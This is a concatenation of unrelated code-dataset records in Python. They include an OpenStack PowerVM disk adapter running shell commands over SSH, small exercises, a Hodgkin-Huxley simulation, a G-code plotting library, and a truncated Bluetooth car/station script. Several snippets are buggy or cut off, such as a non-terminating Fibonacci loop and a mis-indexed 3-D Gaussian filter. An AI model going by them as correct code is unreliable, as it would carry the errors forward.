See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport hashlib\nimport os\nimport re\n\nfrom nova import utils\n\nfrom nova.openstack.common import cfg\nfrom nova.openstack.common import excutils\nfrom nova.openstack.common import log as logging\nfrom nova.virt import images\nfrom nova.virt.powervm import command\nfrom nova.virt.powervm import common\nfrom nova.virt.powervm import constants\nfrom nova.virt.powervm import exception\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\n\n\nclass PowerVMDiskAdapter(object):\n pass\n\n\nclass PowerVMLocalVolumeAdapter(PowerVMDiskAdapter):\n \"\"\"Default block device providor for PowerVM\n\n This disk adapter uses logical volumes on the hosting VIOS\n to provide backing block devices for instances/LPARs\n \"\"\"\n\n def __init__(self, connection):\n super(PowerVMLocalVolumeAdapter, self).__init__()\n\n self.command = command.IVMCommand()\n\n self._connection = None\n self.connection_data = connection\n\n def _set_connection(self):\n if self._connection is None:\n self._connection = common.ssh_connect(self.connection_data)\n\n def create_volume(self, size):\n \"\"\"Creates a logical volume with a minimum size\n\n :param size: size of the logical volume in bytes\n :returns: string -- the name of the new logical volume.\n :raises: PowerVMNoSpaceLeftOnVolumeGroup\n \"\"\"\n return self._create_logical_volume(size)\n\n def delete_volume(self, disk_name):\n \"\"\"Removes the Logical Volume and its associated vSCSI connection\n\n :param disk_name: name of Logical Volume device in /dev/\n \"\"\"\n LOG.debug(_(\"Removing the logical volume '%s'\") % disk_name)\n self._remove_logical_volume(disk_name)\n\n def create_volume_from_image(self, context, instance, image_id):\n \"\"\"Creates a Logical Volume and copies the specified image to it\n\n :param context: nova context used to retrieve image from glance\n :param instance: instance to create the volume for\n :image_id: image_id reference used to locate image in glance\n :returns: dictionary with the name of the created\n Logical Volume device in 'device_name' key\n \"\"\"\n\n file_name = '.'.join([image_id, 'gz'])\n file_path = os.path.join(CONF.powervm_img_local_path,\n file_name)\n\n if not os.path.isfile(file_path):\n LOG.debug(_(\"Fetching image '%s' from glance\") % image_id)\n images.fetch_to_raw(context, image_id, file_path,\n instance['user_id'],\n project_id=instance['project_id'])\n else:\n LOG.debug((_(\"Using image found at '%s'\") % file_path))\n\n LOG.debug(_(\"Ensuring image '%s' exists on IVM\") % file_path)\n remote_path = CONF.powervm_img_remote_path\n remote_file_name, size = self._copy_image_file(file_path, remote_path)\n\n # calculate root device size in bytes\n # we respect the minimum root device size in constants\n size_gb = max(instance['instance_type']['root_gb'],\n constants.POWERVM_MIN_ROOT_GB)\n size = size_gb * 1024 * 1024 * 1024\n\n try:\n LOG.debug(_(\"Creating logical volume of size %s bytes\") % size)\n disk_name = self._create_logical_volume(size)\n\n LOG.debug(_(\"Copying image to the device '%s'\") % disk_name)\n self._copy_file_to_device(remote_file_name, disk_name)\n except Exception:\n LOG.error(_(\"Error while creating logical volume from image. 
\"\n \"Will attempt cleanup.\"))\n # attempt cleanup of logical volume before re-raising exception\n with excutils.save_and_reraise_exception():\n try:\n self.delete_volume(disk_name)\n except Exception:\n msg = _('Error while attempting cleanup of failed '\n 'deploy to logical volume.')\n LOG.exception(msg)\n\n return {'device_name': disk_name}\n\n def create_image_from_volume(self):\n raise NotImplementedError()\n\n def migrate_volume(self):\n raise NotImplementedError()\n\n def attach_volume_to_host(self, *args, **kargs):\n pass\n\n def detach_volume_from_host(self, *args, **kargs):\n pass\n\n def _create_logical_volume(self, size):\n \"\"\"Creates a logical volume with a minimum size.\n\n :param size: size of the logical volume in bytes\n :returns: string -- the name of the new logical volume.\n :raises: PowerVMNoSpaceLeftOnVolumeGroup\n \"\"\"\n vgs = self.run_vios_command(self.command.lsvg())\n cmd = self.command.lsvg('%s -field vgname freepps -fmt :' %\n ' '.join(vgs))\n output = self.run_vios_command(cmd)\n found_vg = None\n\n # If it's not a multiple of 1MB we get the next\n # multiple and use it as the megabyte_size.\n megabyte = 1024 * 1024\n if (size % megabyte) != 0:\n megabyte_size = int(size / megabyte) + 1\n else:\n megabyte_size = size / megabyte\n\n # Search for a volume group with enough free space for\n # the new logical volume.\n for vg in output:\n # Returned output example: 'rootvg:396 (25344 megabytes)'\n match = re.search(r'^(\\w+):\\d+\\s\\((\\d+).+$', vg)\n if match is None:\n continue\n vg_name, avail_size = match.groups()\n if megabyte_size <= int(avail_size):\n found_vg = vg_name\n break\n\n if not found_vg:\n LOG.error(_('Could not create logical volume. '\n 'No space left on any volume group.'))\n raise exception.PowerVMNoSpaceLeftOnVolumeGroup()\n\n cmd = self.command.mklv('%s %sB' % (found_vg, size / 512))\n lv_name = self.run_vios_command(cmd)[0]\n return lv_name\n\n def _remove_logical_volume(self, lv_name):\n \"\"\"Removes the lv and the connection between its associated vscsi.\n\n :param lv_name: a logical volume name\n \"\"\"\n cmd = self.command.rmvdev('-vdev %s -rmlv' % lv_name)\n self.run_vios_command(cmd)\n\n def _copy_file_to_device(self, source_path, device, decompress=True):\n \"\"\"Copy file to device.\n\n :param source_path: path to input source file\n :param device: output device name\n :param decompress: if True (default) the file will be decompressed\n on the fly while being copied to the drive\n \"\"\"\n if decompress:\n cmd = ('gunzip -c %s | dd of=/dev/%s bs=1024k' %\n (source_path, device))\n else:\n cmd = 'dd if=%s of=/dev/%s bs=1024k' % (source_path, device)\n self.run_vios_command_as_root(cmd)\n\n def _copy_image_file(self, source_path, remote_path, decompress=False):\n \"\"\"Copy file to VIOS, decompress it, and return its new size and name.\n\n :param source_path: source file path\n :param remote_path remote file path\n :param decompress: if True, decompressess the file after copying;\n if False (default), just copies the file\n \"\"\"\n # Calculate source image checksum\n hasher = hashlib.md5()\n block_size = 0x10000\n img_file = file(source_path, 'r')\n buf = img_file.read(block_size)\n while len(buf) > 0:\n hasher.update(buf)\n buf = img_file.read(block_size)\n source_cksum = hasher.hexdigest()\n\n comp_path = os.path.join(remote_path, os.path.basename(source_path))\n uncomp_path = comp_path.rstrip(\".gz\")\n if not decompress:\n final_path = comp_path\n else:\n final_path = \"%s.%s\" % (uncomp_path, source_cksum)\n\n # Check 
whether the image is already on IVM\n output = self.run_vios_command(\"ls %s\" % final_path,\n check_exit_code=False)\n\n # If the image does not exist already\n if not len(output):\n # Copy file to IVM\n common.ftp_put_command(self.connection_data, source_path,\n remote_path)\n\n # Verify image file checksums match\n cmd = (\"/usr/bin/csum -h MD5 %s |\"\n \"/usr/bin/awk '{print $1}'\" % comp_path)\n output = self.run_vios_command_as_root(cmd)\n if not len(output):\n LOG.error(_(\"Unable to get checksum\"))\n raise exception.PowerVMFileTransferFailed()\n if source_cksum != output[0]:\n LOG.error(_(\"Image checksums do not match\"))\n raise exception.PowerVMFileTransferFailed()\n\n if decompress:\n # Unzip the image\n cmd = \"/usr/bin/gunzip %s\" % comp_path\n output = self.run_vios_command_as_root(cmd)\n\n # Remove existing image file\n cmd = \"/usr/bin/rm -f %s.*\" % uncomp_path\n output = self.run_vios_command_as_root(cmd)\n\n # Rename unzipped image\n cmd = \"/usr/bin/mv %s %s\" % (uncomp_path, final_path)\n output = self.run_vios_command_as_root(cmd)\n\n # Remove compressed image file\n cmd = \"/usr/bin/rm -f %s\" % comp_path\n output = self.run_vios_command_as_root(cmd)\n\n else:\n LOG.debug(_(\"Image found on host at '%s'\") % final_path)\n\n # Calculate file size in multiples of 512 bytes\n output = self.run_vios_command(\"ls -o %s|awk '{print $4}'\" %\n final_path, check_exit_code=False)\n if len(output):\n size = int(output[0])\n else:\n LOG.error(_(\"Uncompressed image file not found\"))\n raise exception.PowerVMFileTransferFailed()\n if (size % 512 != 0):\n size = (int(size / 512) + 1) * 512\n\n return final_path, size\n\n def run_vios_command(self, cmd, check_exit_code=True):\n \"\"\"Run a remote command using an active ssh connection.\n\n :param command: String with the command to run.\n \"\"\"\n self._set_connection()\n stdout, stderr = utils.ssh_execute(self._connection, cmd,\n check_exit_code=check_exit_code)\n return stdout.strip().splitlines()\n\n def run_vios_command_as_root(self, command, check_exit_code=True):\n \"\"\"Run a remote command as root using an active ssh connection.\n\n :param command: List of commands.\n \"\"\"\n self._set_connection()\n stdout, stderr = common.ssh_command_as_root(\n self._connection, command, check_exit_code=check_exit_code)\n return stdout.read().splitlines()\n","sub_path":"nova/virt/powervm/blockdev.py","file_name":"blockdev.py","file_ext":"py","file_size_in_byte":11471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220437523","text":"def FibonacciNumbers(range):\n fibList = [1,2,3]\n newList = []\n\n while fibList[-1] < range:\n for number in fibList:\n newList.append(number + (fibList[fibList.index(number) - 1]))\n print(newList)\n\nFibonacciNumbers(10)\n\n\n#return index of list [\"foo\",\"bar\",\"baz\"].index(\"bar\") = 1","sub_path":"EvenFibonacciNumbers.py","file_name":"EvenFibonacciNumbers.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"187471376","text":"import numpy as np\n\n\ndef get_gaussian_filter_slow(extend, sigma, dimension):\n \"\"\"\n Get a gaussian filter with length of 2 * extend + 1 along each dimension\n :param extend:\n :param sigma:\n :param dimension: Specify whether it's 2D or 3D\n :return:\n \"\"\"\n\n if dimension == 2:\n\n holder = np.zeros((2 * extend + 1, 2 * extend + 1), dtype=np.float64)\n for l in range(-extend, extend + 1):\n for m in 
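# --- editor's illustrative sketch (not part of the dataset records; `path` is a
# --- hypothetical argument) ---
# The checksum loop in the record above uses the Python 2 file() builtin. A
# modern Python 3 equivalent streams the file through MD5 with the same fixed
# block size:
import hashlib

def md5_of_file(path, block_size=0x10000):
    hasher = hashlib.md5()
    with open(path, 'rb') as img_file:  # binary mode; file() no longer exists
        for buf in iter(lambda: img_file.read(block_size), b''):
            hasher.update(buf)
    return hasher.hexdigest()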
range(-extend, extend + 1):\n holder[l, m] = np.exp(-(l ** 2 + m ** 2) / (2 * sigma ** 2))\n\n # Normalize the filter\n holder /= np.sum(holder)\n\n elif dimension == 3:\n holder = np.zeros((2 * extend + 1,\n 2 * extend + 1,\n 2 * extend + 1), dtype=np.float64)\n for l in range(-extend, extend + 1):\n for m in range(-extend, extend + 1):\n for n in range(-extend, extend + 1):\n holder[l, m] = np.exp(-(l ** 2 + m ** 2) / (2 * sigma ** 2))\n\n # Normalize the filter\n holder /= np.sum(holder)\n\n else:\n raise Exception(\"dimension has to be integer 2 or 3.\")\n\n return holder\n\n\ndef get_gaussian_filter(extend, sigma, dimension):\n \"\"\"\n Get a gaussian filter quickly.\n\n :param extend:\n :param sigma:\n :param dimension:\n :return:\n \"\"\"\n coor = np.meshgrid(*tuple((np.arange(-extend,\n extend + 1,\n dtype=np.float64),) * dimension))\n\n holder = np.square(coor[0])\n for l in range(1, dimension):\n holder += np.square(coor[l])\n\n # Scale according to the sigma\n holder /= -(sigma ** 2)\n\n # Apply the exp function\n np.exp(holder, out=holder)\n\n return holder\n","sub_path":"outdate/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"442386014","text":"from qiskit import QuantumProgram\r\n#from qiskit.tools.visualization import plot_histogram\r\n#from qasm2image import qasm2png\r\n\r\nclass Quantum_culc:\r\n qp = QuantumProgram()\r\n qr = qp.create_quantum_register(\"qr\", 3)\r\n cr = qp.create_classical_register(\"cr\", 3)\r\n\r\n @classmethod\r\n def A_circuit(self):\r\n qp = self.qp\r\n qr = self.qr\r\n cr = self.cr\r\n qc = self.qp.create_circuit(\"A_circuit\", [qr], [cr])\r\n qc.cx(qr[0], qr[2])\r\n qc.measure(qr[0], cr[0])\r\n qc.measure(qr[1], cr[1])\r\n qc.measure(qr[2], cr[2])\r\n result_A = qp.execute(\"A_circuit\")\r\n print(result_A.get_counts(\"A_circuit\"))\r\n #print(qc.qasm())\r\n #print(qasm2png(qc.qasm()))\r\n\r\n @classmethod\r\n def B_circuit(self):\r\n qp = self.qp\r\n qr = self.qr\r\n cr = self.cr\r\n qc = self.qp.create_circuit(\"B_circuit\", [qr], [cr])\r\n qc.cx(qr[1], qr[0])\r\n qc.cx(qr[0], qr[1])\r\n qc.cx(qr[1], qr[2])\r\n qc.cx(qr[0], qr[1])\r\n qc.cx(qr[1], qr[0])\r\n qc.measure(qr[0], cr[0])\r\n qc.measure(qr[1], cr[1])\r\n qc.measure(qr[2], cr[2])\r\n result_B = qp.execute(\"B_circuit\")\r\n print(result_B.get_counts(\"B_circuit\"))\r\n\r\n\r\n @classmethod\r\n def C_circuit(self):\r\n qp = self.qp\r\n qr = self.qr\r\n cr = self.cr\r\n qc = self.qp.create_circuit(\"C_circuit\", [qr], [cr])\r\n qc.cx(qr[0], qr[1])\r\n qc.cx(qr[1], qr[2])\r\n qc.cx(qr[0], qr[1])\r\n qc.cx(qr[1], qr[2])\r\n qc.measure(qr[0], cr[0])\r\n qc.measure(qr[1], cr[1])\r\n qc.measure(qr[2], cr[2])\r\n result_C = qp.execute(\"C_circuit\")\r\n print(result_C.get_counts(\"C_circuit\"))\r\n\r\n @classmethod\r\n def D_circuit(self):\r\n qp = self.qp\r\n qr = self.qr\r\n cr = self.cr\r\n qc = self.qp.create_circuit(\"D_circuit\", [qr], [cr])\r\n qc.h(qr[0])\r\n qc.h(qr[2])\r\n qc.cx(qr[1], qr[2])\r\n qc.cx(qr[2], qr[1])\r\n qc.cx(qr[2], qr[1])\r\n qc.cx(qr[1], qr[2])\r\n qc.h(qr[0])\r\n qc.h(qr[2])\r\n qc.measure(qr[0], cr[0])\r\n qc.measure(qr[1], cr[1])\r\n qc.measure(qr[2], cr[2])\r\n result_D = qp.execute(\"D_circuit\")\r\n print(result_D.get_counts(\"D_circuit\"))\r\n\r\n\r\nif __name__ == '__main__':\r\n Quantum_culc.A_circuit()\r\n Quantum_culc.B_circuit()\r\n Quantum_culc.C_circuit()\r\n 
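# --- editor's illustrative sketch (not part of the dataset records) ---
# Cross-check for the Gaussian-filter record above: its 3-D loop assigns
# holder[l, m] where holder[l, m, n] with an n**2 term is presumably intended,
# and the fast variant divides by sigma**2 without the factor 2 or the final
# normalization. A compact reference implementation for comparison:
import numpy as np

def gaussian_kernel(extend, sigma, dimension):
    """Normalized N-D Gaussian kernel exp(-r^2 / (2 sigma^2))."""
    axes = (np.arange(-extend, extend + 1, dtype=np.float64),) * dimension
    grids = np.meshgrid(*axes, indexing='ij')
    r2 = sum(np.square(g) for g in grids)  # squared distance from the center
    kernel = np.exp(-r2 / (2.0 * sigma ** 2))
    return kernel / kernel.sum()

k = gaussian_kernel(3, 1.5, 2)
assert k.shape == (7, 7) and np.isclose(k.sum(), 1.0)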
Quantum_culc.D_circuit()\r\n","sub_path":"four_gates.py","file_name":"four_gates.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"104228225","text":"from random import *\n\ndef leseDatei():\n datei = open('questions.txt', 'r')\n text = datei.read()\n datei.close()\n return text\n\ndef frageStellen(combined):\n processed=[]\n processed=combined.split(\"!\")\n print(processed[0])\n print(processed[1],processed[2],processed[3],processed[4])\n if processed[5]==input():\n return True\n else:\n return False\n\n\ndef quizStarten():\n print(\"Welche Spieler sollen mit spielen?\")\n spieler = []\n questions=[]\n verloren=False\n eingabe = \" \"\n beantwortet=False\n while not eingabe==\"\":\n eingabe = input()\n if not eingabe==\"\":\n spieler.append(eingabe)\n spielerCounter=0\n spielerKonto = [500 for i in range(len(spieler))]\n questions=leseDatei().splitlines()\n\n #loops the questions\n while verloren==False:\n #checks if spieler counter greater than number of players\n if spielerCounter.+)/$', 'views.rss', name ='rss-feed'),\n (r'^ajax/', include(ajax_urlpatterns)),\n (r'^export/$', 'backup_views.export_urls'),\n (r'^import/$', 'backup_views.import_urls'),\n )","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"562480318","text":"import numpy as np\nimport pylab as plt\n\n\n##############################################################################################\ndef set_parameters():\n '''\n Defines simulation, stimulus and neuron parameters and stores values in parameter dictionary p.\n\n Returns:\n --------\n p : dict\n Parameter dictionary.\n \n '''\n\n ## initialise new dictionary\n p = {}\n\n ## simulation parameters\n p['T'] = 50. ## simulation time (ms)\n p['dt'] = 0.025 ## simulation time resolution (ms)\n\n ## stimulus parameters\n p['I_amp'] = 10. ## input current amplitude (uA/cm2)\n p['t_stim_on'] = 5. ## stimulus-on time (ms)\n p['t_stim_off'] = 30. ## stimulus-off time (ms)\n\n ## neuron parameters\n p['V_rest'] = -65. ## resting potential (mV)\n p['Cm'] = 1. ## membrane capacitance (uF/cm2)\n p['gbar_Na'] = 120. ## max. Na conductance (mS/cm2)\n p['gbar_K'] = 36. ## max K conductance (mS/cm2)\n p['gbar_l'] = 0.3 ## leak conductance (mS/cm2)\n p['E_Na'] = 50. ## Na reversal potentail (mV)\n p['E_K'] = -77. ## K reversal potentail (mV)\n p['E_l'] = -54.387 ## Leak reversal potentail (mV)\n\n ## voltage dependence of gate variables \n ### K activation\n p['alpha_n'] = np.vectorize(\n lambda v: 0.01 * (v + 55.) / (1. - np.exp(-(v + 55.) / 10.)) if v != -55. else 0.1\n ) ## activation rate (1/ms)\n p['beta_n'] = lambda v: 0.125 * np.exp(-(v + 65.) / 80.) ## inactivation rate (1/ms)\n\n ### Na activation\n p['alpha_m'] = np.vectorize(\n lambda v: 0.1 * (v + 40.) / (1. - np.exp(-(v + 40.) / 10.)) if v != -40. else 1\n ) ## activation rate (1/ms)\n p['beta_m'] = lambda v: 4. * np.exp(-(v + 65.) / 18.) ## inactivation rate (1/ms)\n\n ### Na inactivation\n p['alpha_h'] = lambda v: 0.07 * np.exp(-(v + 65.) / 20.) ## activation rate (1/ms)\n p['beta_h'] = lambda v: 1. / (1. + np.exp(-(v + 35.) 
/ 10.)) ## inactivation rate (1/ms)\n\n derived_parameters(p) ## add derived parameters to dictionary (see below)\n\n ## HINT: Storing parameters in dictionaries simplifies function definitions by reducing number of arguments (see below).\n return p\n\n\n##############################################################################################\ndef derived_parameters(p):\n '''\n Set derived parameters, i.e. parameters which are fully defined by parameters in p.\n\n Parameters:\n -----------\n p: dict\n Parameter dictionary\n \n Returns:\n --------\n nothing (p is modified \"on-the-fly\").\n \n '''\n\n p['time'] = np.arange(0, p['T'] + p['dt'], p['dt']) ## time array (ms)\n p['n_inf'] = lambda v: p['alpha_n'](v) / (p['alpha_n'](v) + p['beta_n'](v)) ## steady-state K activation\n p['tau_n'] = lambda v: 1. / (p['alpha_n'](v) + p['beta_n'](v)) ## (ms)\n p['m_inf'] = lambda v: p['alpha_m'](v) / (p['alpha_m'](v) + p['beta_m'](v)) ## steady-state Na activation\n p['tau_m'] = lambda v: 1. / (p['alpha_m'](v) + p['beta_m'](v)) ## (ms)\n p['h_inf'] = lambda v: p['alpha_h'](v) / (p['alpha_h'](v) + p['beta_h'](v)) ## steady-state Na inactivation\n p['tau_h'] = lambda v: 1. / (p['alpha_h'](v) + p['beta_h'](v)) ## (ms)\n\n\n##############################################################################################\ndef stimulus(p):\n '''\n Consctructs array I of input currents with\n\n I(t) = p['I_amp'] for p['t_stim_on'] <= t <= p['t_stim_off']\n I(t) = 0.0 else.\n\n (i.e. current pulse of length p['t_stim_off']-p['t_stim_on']).\n \n Parameters:\n -----------\n p: dict\n Parameter dictionary\n \n Returns:\n --------\n I: ndarray\n Array of input currents with with len(I) = len(p['time']).\n\n '''\n\n I = np.zeros(len(p['time']))\n N = len(p['time'])\n n = 0\n while (n < N):\n t = n * p['dt']\n if t > p['t_stim_on'] and t < p['t_stim_off']:\n I[n] = p['I_amp']\n else:\n I[n] = 0\n\n n += 1\n\n return I\n\n\n##############################################################################################\ndef update(Vm, m, h, n, I, p):\n '''\n Updates neuron state (Vm,m,h,n) from time step i-1 to time step i.\n\n Parameters:\n -----------\n Vm: float\n Membrane potentential at time step i-1.\n m: float\n Na activation at time step i-1.\n h: float\n Na inactivation at time step i-1.\n n: float\n K activation at time step i-1.\n I: float\n Input current at time step i-1.\n p: dict\n Parameter dictionary\n \n Returns:\n --------\n Vm: float\n Membrane potentential at time step i.\n m: float\n Na activation at time step i.\n h: float\n Na inactivation at time step i. 
\n n: float\n K activation at time step i.\n '''\n\n Vm = Vm + p['dt']/p['Cm']*(\\\n I \\\n - p['gbar_K'] *n**4* (Vm - p['E_K']) \\\n - p['gbar_Na']*m**3*h*(Vm - p['E_Na']) \\\n - p['gbar_l'] * (Vm - p['E_l']) \\\n )\n m = m + p['dt'] * (p['m_inf'](Vm) - m) / p['tau_m'](Vm)\n h = h + p['dt'] * (p['h_inf'](Vm) - h) / p['tau_h'](Vm)\n n = n + p['dt'] * (p['n_inf'](Vm) - n) / p['tau_n'](Vm)\n return Vm, m, h, n\n\n\n##############################################################################################\ndef simulate(p):\n '''\n 1) Initialises state variables Vm, m, h, n with respective values at resting potential p['V_rest'].\n 2) Constructs and returns array I of input currents by calling stimulus().\n 3) Constructs array Vm of membrane potentials by calling update() in each time step.\n\n Parameters:\n -----------\n p: dict\n Parameter dictionary\n \n Returns:\n --------\n Vm: ndarray\n Array of membrane potentials with len(Vm) = len(p['time']).\n I: ndarray\n Array of input currents with len(I) = len(p['time']).\n\n '''\n\n Vm = np.zeros(len(p['time']))\n m = np.zeros(len(p['time']))\n h = np.zeros(len(p['time']))\n n = np.zeros(len(p['time']))\n\n Vm[0] = p['V_rest']\n m[0] = p['m_inf'](Vm[0])\n n[0] = p['n_inf'](Vm[0])\n h[0] = p['h_inf'](Vm[0])\n\n I = stimulus(p)\n\n spikes = 0\n sIndex = -1\n N = len(p['time'])\n i = 0\n while (i < N - 1):\n Vm[i+1], m[i+1], h[i+1] , n[i+1] \\\n = update(Vm[i], m[i], h[i], n[i], I[i], p)\n i += 1\n\n return Vm, I\n\n##############################################################################################\n##############################################################################################\n## main program\n\nif __name__ == \"__main__\":\n\n ## set parameters\n p = set_parameters()\n\n ## simulate\n Vm, I = simulate(p)\n\n ## plot results\n plt.figure(1)\n plt.clf()\n\n ### input current\n sp1 = plt.subplot(211)\n plt.plot(p['time'], I, 'k-', lw=3)\n plt.ylabel('input current ($\\mu$A/cm$^2$)')\n plt.xlim(p['time'][0], p['time'][-1])\n offset = 0.1 * np.abs(np.max(I) - np.min(I))\n plt.ylim(np.min(I) - offset, np.max(I) + offset)\n sp1.set_position([0.1, 0.65, 0.8, 0.3])\n plt.setp(plt.gca(), xticklabels=[])\n\n ### membrane potential\n sp2 = plt.subplot(212)\n plt.plot(p['time'], Vm, 'k-', lw=3)\n plt.ylabel('membrane potential (mV)')\n plt.xlabel('time (ms)')\n plt.xlim(p['time'][0], p['time'][-1])\n offset = 0.1 * np.abs(np.max(Vm) - np.min(Vm))\n plt.ylim(np.min(Vm) - offset, np.max(Vm) + offset)\n sp2.set_position([0.1, 0.1, 0.8, 0.5])\n\n plt.savefig('hh_membrane_pot', format='pdf', bbox_inches='tight')\n plt.show()\n","sub_path":"pettersen_einevoll/action_potential/hh.py","file_name":"hh.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"344257328","text":"READ_FILE=True\n\nif(READ_FILE):\n import sys\n sys.stdin=open('in.txt', 'r')\n print(\"read from file\")\n\nn, m=int(input(\"length:\" if not READ_FILE else \"\")), int(input(\"width:\" if not READ_FILE else \"\"))\n\nif(not READ_FILE):\n print(\"input matrix:\")\nmaze=[]\nfor i in range(m):\n s=input().split()\n for i in range(n):\n s[i]=int(s[i])\n maze.append(s)\n\ndirection=[[0, -1], [0, 1], [1, 0], [-1, 0]]\nsolution=[]\n\ndef Add(a, b):\n return [a[0]+b[0], a[1]+b[1]]\n\ndef Valid(a):\n return a[0]>=0 and a[0]=0 and a[1] 0:\n (dist, reverse, nearest) = min(dist_reverse_iterator(gs),\n key=itemgetter(0, 1))\n gs.remove(nearest)\n\n if reverse:\n prev = 
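# --- editor's illustrative sketch (not part of the dataset records) ---
# The stimulus() function above fills the current array with a while loop; a
# vectorized NumPy equivalent of the same rectangular pulse (endpoint handling
# up to convention):
import numpy as np

t = np.arange(0.0, 50.0 + 0.025, 0.025)            # ms, matches p['time']
I = np.where((t >= 5.0) & (t <= 30.0), 10.0, 0.0)  # uA/cm^2
assert I[0] == 0.0 and I.max() == 10.0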
nearest.reversed_copy()\n else:\n prev = nearest\n\n ordered.append(prev)\n\n return ordered\n\ndef prune_small_distance_penups(instructions):\n instructions = iter(instructions)\n try:\n prev = next(instructions)\n except StopIteration:\n raise ValueError(\"instructions empty\")\n # The first instruction should always be a penup, so we send it straight\n # through.\n yield prev\n\n try:\n while True:\n current = next(instructions)\n if current.typename == 'penup':\n last_down = prev\n penup = current\n\n # Get all moves while the pen is up. There should only ever be\n # one, but you never know these days. :-)\n moves = []\n try:\n while True:\n penup_move = next(instructions)\n if penup_move.typename == 'pendown':\n pendown = penup_move\n break\n else:\n moves.append(penup_move)\n except StopIteration:\n # If we reach the end of the instructions while looking for\n # a pendown, raise the pen and call it good.\n yield penup\n raise StopIteration\n\n if calculate_distance(moves[-1].coords, last_down.coords) <= min_penup_travel_distance:\n # The penup move(s) didn't travel the minimum desired distance,\n # so we remove them from the list of instructions and continue\n # to the next instruction.\n continue\n else:\n # The penup move(s) DID move enough, so we keep them.\n yield penup\n for move in moves:\n yield move\n yield pendown\n else:\n yield current\n prev = current\n\n except StopIteration:\n pass\n\ndef clean_instructions(instructions):\n cleaned = []\n is_pen_up = True\n clean_instructions.prev = None\n\n def keep_instruction(instruction):\n if (instruction.typecode == \"G0\" and instruction.coords is not None):\n if ((clean_instructions.prev.typename == 'pendown') and clean_instructions.prev is not None) and (\"F\" not in instruction.line):\n # Insert feed rate for first pendown move\n instruction.line = replace_text_between(instruction.line, \"G0 \", \"X\", feedrate_value + \" \")\n elif (\"F\" in instruction.line):\n # Remove feed rate for next moves\n instruction.line = replace_text_between(instruction.line, \"G0 \", \"X\", \"\")\n \n clean_instructions.prev = instruction\n cleaned.append(instruction)\n\n for instruction in instructions:\n if instruction.typename == 'penup':\n is_pen_up = True\n elif instruction.typename == 'pendown':\n is_pen_up = False\n\n if (instruction.typecode == \"G1\"):\n if is_pen_up:\n # Keep G1 instruction if pen is up\n keep_instruction(instruction)\n else:\n # If pen is down, it should be a G0 move.\n # Only keep if it travels a distance\n if(clean_instructions.prev is not None and clean_instructions.prev.coords):\n\n if calculate_distance(clean_instructions.prev.coords, instruction.coords) > 0:\n instruction.typecode = \"G0\"\n instruction.line = instruction.line.replace(\"G1\", \"G0\")\n keep_instruction(instruction)\n else:\n\n if instruction.typecode == \"G0\" and instruction.coords is not None and clean_instructions.prev is not None and clean_instructions.prev.coords is not None:\n if not (calculate_distance(clean_instructions.prev.coords, instruction.coords) > 0):\n # Skip duplicate instruction\n continue\n \n # Keep these instructions\n keep_instruction(instruction)\n\n return cleaned\n\ndef dedupe(gs):\n \"Use Glyph.__hash__() to dedupe the list of glyphs\"\n seen = set()\n for g in gs:\n h = hash(g)\n if h not in seen:\n yield g\n seen.add(h)\n\ndef iter_instructions(gs):\n # be sure to start with a penup\n yield Instruction(penup_value)\n for g in gs:\n for i in g.ordered_instructions():\n yield 
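# --- editor's illustrative sketch (not part of the dataset records) ---
# The ordering loop above repeatedly picks the nearest remaining glyph. The
# same greedy nearest-neighbour idea on plain 2-D points:
from math import hypot

def order_greedy(points, start=(0.0, 0.0)):
    remaining, ordered, here = list(points), [], start
    while remaining:
        nearest = min(remaining,
                      key=lambda p: hypot(p[0] - here[0], p[1] - here[1]))
        remaining.remove(nearest)
        ordered.append(nearest)
        here = nearest
    return ordered

assert order_greedy([(5, 5), (1, 1), (3, 3)]) == [(1, 1), (3, 3), (5, 5)]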
i\n","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":11525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"319515573","text":"# ------------------------------------------------------------------------------------------------------------------------------------------------------ Importes necesarios.\n\nimport os \nimport json\nimport time\nimport random\nimport httplib2\nimport bluetooth\nimport threading\nfrom sense_hat import SenseHat\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Comentarios codigos Bluethoot.\n\n'''\nRaspberryJ - B8:27:EB:61:92:70\n\nCodigos usados para la comunicacion bluetooth:\n \n- DgnV: Codigo usado para iniciar la comunicacion, es usado por el auto para \n solicitar el id de la estacion, junto a este mensaje se envia el id del auto.\n \n- sjC1: Codigo usado para responder a la solicitud de inicio de una comunicacion,\n es usado por la estacion para responder al codigo DgnV enviado por al auto,\n junto a este mensaje se envia el id de la estacion.\n \n- 8ESt: Codigo usado por el auto para solicitar combustible, es acompañado de la\n cantidad y el tipo de combustible solicitado.\n \n- wjOL: Codigo usado por la estacion para confiramr el incio del envio de unidades de combustible.\n \n- R7d0: Codigo usado por la estacion para transferir una unidad de combustible al auto.\n\n- aDYT: Codigo usado por la estacion para confirmar la finalizacion de envio de unidaes de combustible.\n \n- Ca5n: Codigo usado por el auto para indicar que ya tiene el tanque lleno. \n \n- QD1F: Codigo usado por el auto para finalizar la comunicacion.\n \n'''\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Variables globales Bluethoot.\n\nsock = \"\"\npuertoEnviar = 1\npuertoEscuchar = 2\ndatosRecividos = \"\"\nmacEstacion = \"B8:27:EB:14:B2:5F\"\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Variables globales Http.\n\nidAuto = 789456123\nhttp = httplib2.Http()\nhttplib2.debuglevel = 0\nservidor = \"7d904b1a.ngrok.io\" #<-------------------- Cambiar.\nheaders = {'Content-Type': 